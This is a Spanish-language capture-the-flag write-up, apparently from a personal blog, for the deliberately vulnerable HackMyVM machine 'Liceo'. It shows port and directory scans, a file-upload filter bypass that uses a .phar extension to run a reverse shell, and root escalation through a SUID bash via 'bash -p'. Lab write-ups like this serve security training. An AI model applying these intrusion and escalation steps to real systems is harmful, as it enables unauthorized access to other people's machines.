cd ~/blog

~/writeups/hmv/051-liceo.md

051 - Liceo

easy Linux hmv 22-03-2024
Unrestricted File Upload (phar bypass)SUID bash Privesc
hackmyvm.eu/machines/machine.php?vm=Liceo

~1 min de lectura


Comenzamos con la enumeración de puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.12
 nmap -sCV -p21,22,80 -oN 02-targeted.txt 192.168.1.12
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-22 14:23 -03
Nmap scan report for 192.168.1.12
Host is up (0.00031s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-rw-r--    1 1000     1000          191 Feb 01 14:29 note.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.1.10
|      Logged in as ftp
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 68:4c:42:8d:10:2c:61:56:7b:26:c4:78:96:6d:28:15 (ECDSA)
|_  256 7e:1a:29:d8:9b:91:44:bd:66:ff:6a:f3:2b:c7:35:65 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Liceo
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.78 seconds

En el FTP anónimo solo hay una nota:

 cat note.txt
Hi Matias, I have left on the web the continuations of today's work,
would you mind contiuing in your turn and make sure that the web will be secure?
Above all, we dont't want intruders...

Enumeramos con gobuster:

 gobuster dir -u 'http://192.168.1.12' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,gif,png -r
...
/index.html           (Status: 200) [Size: 21487]
/images               (Status: 200) [Size: 6715]
/uploads              (Status: 200) [Size: 743]
/upload.php           (Status: 200) [Size: 371]
/css                  (Status: 200) [Size: 1746]
/js                   (Status: 200) [Size: 1347]
...

Hay un formulario de subida. La subida de .php falla, pero renombrando a .phar tenemos éxito. Accedemos a http://192.168.1.12/uploads/, ejecutamos la reverse shell y obtenemos la primera flag.

Para escalar a root, comprobamos los permisos de /bin/bash:

bash-5.1$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1396520 Jan  6  2022 /bin/bash

Bash tiene el bit SUID, así que basta con lanzarlo con -p para obtener una shell de root:

bash-5.1$ bash -p
whoami
root

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados